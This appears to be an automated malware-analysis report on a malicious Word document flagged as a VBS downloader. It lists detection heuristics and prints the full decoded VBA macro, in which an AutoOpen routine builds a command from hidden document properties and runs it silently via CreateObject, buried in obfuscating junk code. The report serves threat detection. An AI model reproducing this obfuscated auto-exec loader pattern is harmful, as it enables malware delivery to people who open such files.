Verdict: MALICIOUS
Risk score: 252

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing obfuscated VBA macros, specifically an AutoOpen macro that uses CreateObject and execution tokens. ClamAV identifies it as a VBSDownloader, indicating its purpose is to download and execute a secondary payload. The obfuscation and use of CreateObject suggest an attempt to evade detection and execute arbitrary code.
Heuristics (9)

- ClamAV: Doc.Macro.VBSDownloader-6336817-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched lines in script:
      eZKbUPWwhYm = MydfuSCwS + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + nsLyNnPeWW
      CreateObject(mPbmCNZeYSe).Run$ eZKbUPWwhYm + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + hkvdTsszN, 0
      KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
    Matched lines in script: the same three lines as the previous finding.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
    Matched lines in script:
      End Function
      Sub autoopen()
      BcCAdkEmz
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6634 bytes |

SHA-256: ffd2cc2f548aca48f7ab8df117f1ceadc0a5f83a450b1164ed8552ee86594c8e

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 98 of 129 identifiers look randomly generated (e.g. 'whMxhRZvtcD'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function PLkRWELtR()
KpPTTSAzp = 7028
Dim MhgpKutPkN(7028)
amwvemvauxZ = "FEytbRKB"
vgPUVPy = "ENHWwKcrgYc"
MhgpKutPkN(2865) = TzPvYrVba
MhgpKutPkN(4146) = hSwWdtKzPR
MhgpKutPkN(1038) = pRKmFMwyEkx
MhgpKutPkN(6893) = 9953 + 5633 + 3205 + 5813 / 607 / 407 / 9094 - 8911 - 9832 - 5860 + 3878 + 7628
MhgpKutPkN(4450) = kgDgXhVDfa
MhgpKutPkN(3452) = cUGXuMNPA
MhgpKutPkN(1730) = SDurXKS
MhgpKutPkN(1780) = kwwMkfM
MhgpKutPkN(5780) = 5388
MhgpKutPkN(2626) = 1868
MhgpKutPkN(908) = 1594
MhgpKutPkN(4640) = 297
MhgpKutPkN(6031) = gBdsNfLmdp
MhgpKutPkN(1694) = BurpdcDrehs
MhgpKutPkN(3810) = 6942 + 9581 + 4881 / 2989 / 4604 - 8268 + 3444
MhgpKutPkN(910) = 1276 + 3440 + 6432 + 4453 / 3112 - 1538 + 6573 + 3020 + 1723
MhgpKutPkN(1108) = 4600 + 5762 / 5583 / 7019 / 9280 - 1170 - 4998 - 2033 + 4209 + 991 + 3585
For KpPTTSAzp = 1236 To 1703
MhgpKutPkN(KpPTTSAzp) = KpPTTSAzp
Next
NmfyxebLh = MhgpKutPkN(5532) + MhgpKutPkN(6894) + MhgpKutPkN(4583) + MhgpKutPkN(4623) + MhgpKutPkN(2029) + MhgpKutPkN(7028)
vvkfUKVMnVk = MhgpKutPkN(4816) + MhgpKutPkN(1383) + MhgpKutPkN(173) + MhgpKutPkN(3684) + MhgpKutPkN(650) + MhgpKutPkN(1651) + MhgpKutPkN(7028)
tuZcTpz = MhgpKutPkN(7009) + MhgpKutPkN(6919) + MhgpKutPkN(2196) + MhgpKutPkN(3675) + MhgpKutPkN(7028)
End Function
Function WhPDWkM()
xbvULRn = 5238
Dim uxcKWkryu(5238)
TdLSNEeEp = "VCpRpSPk"
FwMNwGNPxfM = "kZWpCVuZBH"
ksLcvyvSr = "EVXaVkwNuU"
uxcKWkryu(5001) = cwLCCHTPXV
uxcKWkryu(2173) = gkmTPYNTP
uxcKWkryu(3425) = 2215 + 6100 + 7606 / 6143 / 1765 / 6093 - 4194 + 4543 + 3630 + 1016
uxcKWkryu(3511) = 3247 + 7954 / 2857 - 2348 - 8186 - 2015 + 8094 + 4210
uxcKWkryu(4422) = 5893 + 4735 / 9993 / 8423 - 8213 - 9972 - 6893 + 9295 + 6793
uxcKWkryu(1742) = kRzygcV
uxcKWkryu(4312) = MHFPBuYLv
uxcKWkryu(2529) = ukmEdRs
uxcKWkryu(3956) = 3706
uxcKWkryu(3252) = SLRhHPVuBkc
uxcKWkryu(4665) = mrLutCdxUyd
uxcKWkryu(643) = 5888 + 1573 + 3767 / 6394 / 4418 / 4981 - 3042 - 3895 + 4468
uxcKWkryu(2639) = 4489 + 8607 + 5529 + 2720 / 335 / 3790 / 2804 - 1661 - 6751 + 437
For xbvULRn = 4850 To 3747
uxcKWkryu(xbvULRn) = xbvULRn
Next
FeUgaDBHr = uxcKWkryu(4619) + uxcKWkryu(2898) + uxcKWkryu(3141) + uxcKWkryu(3142) + uxcKWkryu(301) + uxcKWkryu(4719) + uxcKWkryu(1510) + uxcKWkryu(5238)
vGFzbEMPz = uxcKWkryu(4596) + uxcKWkryu(1907) + uxcKWkryu(2185) + uxcKWkryu(2185) + uxcKWkryu(5070) + uxcKWkryu(2222) + uxcKWkryu(5238)
WwaMrHnw = uxcKWkryu(741) + uxcKWkryu(4970) + uxcKWkryu(4225) + uxcKWkryu(4448) + uxcKWkryu(4953) + uxcKWkryu(5091) + uxcKWkryu(5238)
End Function
Sub autoopen()
BcCAdkEmz
End Sub
Public Function bPYCzetMyz(bNXDkMDgLrt)
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
YykCMff = ActiveDocument.CustomDocumentProperties(bNXDkMDgLrt)
bPYCzetMyz = YykCMff
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
End Function
Public Function BcCAdkEmz()
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
mPbmCNZeYSe = bPYCzetMyz("yVbtGRByCEz") + bPYCzetMyz("WCFGhxbUvN") + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + bPYCzetMyz("ZfLztWWpgn") + bPYCzetMyz("HnFapFwUGZ") + bPYCzetMyz("WmDuayspUr")
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
MydfuSCwS = bPYCzetMyz("pzUFheCWy") + bPYCzetMyz("YaRvZCykab") + bPYCzetMyz("YMRbVEWGRXk") + bPYCzetMyz("tyWntzdpCuH") + bPYCzetMyz("rcYtNCxTrt") + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + bPYCzetMyz("ZvBrbCxtFA")
eZKbUPWwhYm = MydfuSCwS + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + nsLyNnPeWW
CreateObject(mPbmCNZeYSe).Run$ eZKbUPWwhYm + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + hkvdTsszN, 0
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
End Function
Function DrsPazDuZR()
eGreNgPsrm = 5495
Dim SGGfUzXB(5495)
GDTkSFkB = ("dmbCuhfXXTy")
pbpDzevCcXM = ("yAZwVwGs")
SGGfUzXB(823) = DTnrffeZAbp
SGGfUzXB(5083) = AScvhDdRC
SGGfUzXB(3737) = xNmRbrM
SGGfUzXB(188) = 302 + 3998 / 2341 / 8526 - 2553 - 847 + 2038
SGGfUzXB(1883) = 99 + 2376 + 7825 / 321 / 7366 - 9172 - 2277 + 1370 + 1352 + 4944
SGGfUzXB(3521) = 3102 + 4546 + 4412 / 4436 / 8266 - 7087 - 3169 - 894 + 6411 + 8882
SGGfUzXB(1734) = VSKrCgDLx
SGGfUzXB(2028) = 2777
SGGfUzXB(4703) = 2836
SGGfUzXB(5396) = 8448
SGGfUzXB(451) = yeCBMPWUSF
SGGfUzXB(1740) = BgRLhgxrB
SGGfUzXB(2886) = CDBxbwmYFBc
SGGfUzXB(1976) = axNCdxP
SGGfUzXB(959) = 3687 + 8010 / 6516 / 6568 / 4877 - 496 - 6745 - 3967 + 9583 + 6229 + 3674
For eGreNgPsrm = 1145 To 2676
SGGfUzXB(eGreNgPsrm) = eGreNgPsrm
Next
whMxhRZvtcD = SGGfUzXB(1124) + SGGfUzXB(197) + SGGfUzXB(5495)
kYCuwfYm = SGGfUzXB(5325) + SGGfUzXB(5495)
BDLmxrDHZ = SGGfUzXB(977) + SGGfUzXB(3468) + SGGfUzXB(4273) + SGGfUzXB(4210) + SGGfUzXB(1868) + SGGfUzXB(1138) + SGGfUzXB(5495)
End Function
Function BUCpnXUM()
eCRFxSXAs = 8429
Dim tntfREKb(8429)
BmrdaZGex = ("nkpNuhFP")
tntfREKb(1901) = hwURRVbh
tntfREKb(4719) = 8208 + 879 + 9517 / 2412 / 3706 / 4079 - 5700 - 2188 - 1797 + 9673 + 1059 + 5879
tntfREKb(4221) = eGbPYZsG
tntfREKb(6971) = 6135
tntfREKb(1058) = ccGgZhetzY
tntfREKb(2647) = 3319 + 785 / 7265 - 4700 - 2022 + 9789 + 9186
tntfREKb(1600) = 1265 + 5269 / 2242 - 8105 - 9347 + 5755 + 9945
tntfREKb(2268) = 1740 + 9975 + 3319 / 5537 / 1326 - 9982 - 3238 + 729 + 2866 + 7308
For eCRFxSXAs = 2931 To 5355
tntfREKb(eCRFxSXAs) = eCRFxSXAs
Next
TgBBLERP = tntfREKb(3861) + tntfREKb(8429)
End Function